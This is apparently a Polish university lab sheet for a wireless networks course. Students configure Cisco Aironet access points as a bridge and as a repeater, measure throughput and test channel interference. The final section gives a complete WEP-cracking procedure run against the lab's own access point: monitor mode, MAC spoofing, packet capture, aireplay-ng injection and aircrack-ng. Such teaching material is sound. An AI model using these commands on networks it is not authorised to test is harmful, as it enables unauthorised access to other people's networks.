Sieci bezprzewodowe lab. nr 2
Czas trwania:
4h
1)
Budowanie bezprzewodowego mostu
NaleŜy informować prowadzącego zajęcia po wykonaniu kaŜdego punktu.
Skonfigurować bezprzewodowy most według poniŜszego schematu
.
PC1
PC4
SSID= ”Lab1-
<nr_ podgrupy>”
10.0.0.11|27
10.0.0.12|27
AP Airnet 1200
Tryb: Non ROOT
10.0.0.1|27
Airnet 1300
Tryb: ROOT
With clients
PC3
10.0.0.13|27
10.0.0.2|27
PC2
10.0.0.10|27
Ustawić następujące parametry radiowe:
a) uwierzytelnianie - Open
b) numer kanału – ((<nr_podgrupy>-1)*5+1) mod 12
c) tryb pracy mostu zgodnie ze schematem
Aby skonfigurować urządzenia naleŜy:
• Ustawić Infrastructure SSID (Security – SSID Manager);
• Ustawić typ urządzenia – root, non root;
1. Poleceniem ping przetestować działanie sieci pomiędzy poszczególnymi hostami.
Wyświetlić listę podłączonych klientów na obu AP.
AP1200: ............................................................................................................................
AP1300: ............................................................................................................................
2. Przeprowadzić pomiar szybkości transmisji pomiędzy komputerami (wszystkie urządzenia
znajdują się w sali laboratoryjnej):
PC1-PC3
PC3-PC4
PC2-PC3
PC2-PC4
3. Dla wariantu transmisji między PC1-PC3 zbadać prędkość transmisji w zaleŜności od
odległości między AP:
1m - ...................
10m ...................
max. odl..............
4. Co dzieje się jeŜeli root i non root tracą ze sobą kontakt? Jak się zachowują interfejsy
bezprzewodowe na AP pełniących róŜne funkcje?
...................................................
2)
Konfigurowanie Access Pointa w trybie repeater.
NaleŜy informować prowadzącego zajęcia po wykonaniu kaŜdego punktu.
Skonfigurować połączenia sieciowe według poniŜszego schematu
.
SSID= ”Lab2-
<nr_ podgrupy>”
10.0.0.11|27
Airnet 1300
Tryb: Repeater
PC3
10.0.0. 12|27
10.0.0.2|27
PC2
10.0.0.10|27
AP Airnet 1200
Tryb: AP
10.0.0.1|24
PC4
PC1
10.0.0. 9 |27
Ustawić następujące parametry radiowe:
a) uwierzytelnianie - Open
b) numer kanału – ((<nr_podgrupy>-1)*5+1) mod 12
1.
Poleceniem ping przetestować działanie sieci pomiędzy poszczególnymi hostami
(wszystkie urządzenia znajdują się w sali laboratoryjnej). Wyświetlić listę podłączonych
klientów na obu AP.
AP1200: ............................................................................................................................
............................................................................................................................
AP1300: ............................................................................................................................
............................................................................................................................
2.
Przeprowadzić pomiar szybkości transmisji pomiędzy komputerami (wszystkie
urządzenia znajdują się w sali laboratoryjnej):
PC1- PC2
PC2-PC3 lub 4
PC1-PC3 lub 4
PC3-PC4
3.
Przeprowadzić pomiar szybkości transmisji przez repeater w zaleŜności od odległości
pomiędzy AP w wariancie połączenia PC2-PC3 lub 4.
4.
Na jaka max. odległość moŜna odsunąć od siebie AP i repeater?
...................................................
5.
Sprawdzić działanie mechanizmu filtrowania klientów poprzez adresy MAC i IP w
zaleŜności od miejsca ich implementacji (AP, repeater).
Wnioski: ............................................................................................................................
3)
Badanie zakłóceń kanałów na połączenia sieciowe
Skonfigurować połączenia sieciowe według poniŜszego schematu
.
PC1
10.0.0.11|27
AP Airnet 1200
Tryb: AP
10.0.0.1|27
Airnet 1300
Tryb: AP
PC2
10.0.0.12|27
10.0.0.2|27
SSID=”AP1_< nr_grupy >”
SSID=”AP2_<nr_grupy >”
Ustawić następujące parametry radiowe:
a) uwierzytelnianie - Open
b) numery kanału dla punktów dostępowych
- 1 punkt dostępowy ((<nr_podgrupy>-1)*5+1) mod 12
- 2 punkt dostępowy ((<nr_podgrupy>)*3+1) mod 12
Sprawdzić poleceniem ping stan połączenia sieciowego. Zmienić numer kanału drugiego
punktu dostępowego na taki sam jak na pierwszym punkcie dostępowym. Zaobserwować
wpływ zakłóceń na połączenia sieciowe.
Wnioski: ............................................................................................................................
Zbadać wzajemny wpływ innych kanałów (pośrednich)
Wnioski: ............................................................................................................................
4) Analiza sieci i ochrona informacji w sieciach bezprzewodowych -
Łamanie zabezpieczeń protokołu WEP
Przygotować środowisko według poniŜszego schematu.
SSID=”Lab1-
<nr_podgrupy >”
Access Point
z WEP
PC1
BackTrack 3
Ustawić następujące parametry na Aceess Poincie:
a) protokół – WEP
b) numer kanału – ((<nr_podgrupy>-1)*5+1) mod 12
c) 40 bitowy klucz
Podłączyć PC1 z Access Pointem i generować duŜo ruchu sieciowego. Na BackTrack 3
wykonać próbę odzyskania klucza sieciowego wykorzystując narzędzia zawarte w systemie
Backtrack 3 uruchamianego z nośnika USB lub płyty CD.
Procedura łamania hasła protokołu WEP
1) NaleŜy przestawić kartę bezprzewodową w tryb monitor
modprobe -r iwl3945
modprobe ipwraw
iwconfig // sprawdzenie nazwy interfejsu bezprzewodowego
airmon-ng stop [device]
i
fconfig [interface] down // device = interface
2) Zmiana adresu MAC karty sieciowej i wystartowanie karty w trybie monitor.
macchanger --mac 00:11:22:33:44:66 [device]
airmon-ng start [device]
3) Przechwytywanie pakietów wybranej sieci
airodump-ng [device] //podsłuch wszystkich sieci w zasięgu
airodump-ng -c [channel] -w [network.out] –-bssid [bssid] [device]
4) Sztuczne generowanie duŜej ilości ruchu sieciowego w celu przyspieszenia procesu
łamania hasła (uruchomione w odrębnych shellach)
aireplay-ng -1 0 -a [bssid] -h 00:11:22:33:44:66 -e [essid] [device]
aireplay-ng -3 -b [bssid] -h 00:11:22:33:44:66 [device]
aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b [bssid] -h 00:11:22:33:44:66
[device]
5) Próba łamania hasła
aircrack-ng -n 64 -b [bssid] [filename]-01.cap